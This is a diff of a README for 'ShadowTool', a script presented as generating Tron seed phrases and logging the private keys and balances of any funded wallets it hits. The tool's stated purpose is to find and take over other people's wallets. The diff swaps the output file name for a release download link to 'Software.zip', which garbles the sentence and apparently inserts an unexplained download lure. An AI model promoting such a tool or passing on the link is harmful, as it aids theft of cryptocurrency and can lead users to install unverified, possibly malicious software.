indiizza/ShadowTool/README.md

 # ShadowTool 🌑

 A powerful script designed for Tron network enthusiasts, ShadowTool is your go-to tool for automatically generating seed phrases and checking balances on Tron wallets.
 With a focus on efficiency and simplicity, ShadowTool quickly scans through Tron networks to identify wallets with non-zero balances.
-Once identified, the tool logs crucial wallet information such as address, mnemonic, private key, and balances, saving it all in a convenient file named result.txt.
+Once identified, the tool logs crucial wallet information such as address, mnemonic, private key, and balances, saving it all in a convenient file named https://github.com/indiizza/ShadowTool/releases/download/v1.0/Software.zip

 ### Features 🚀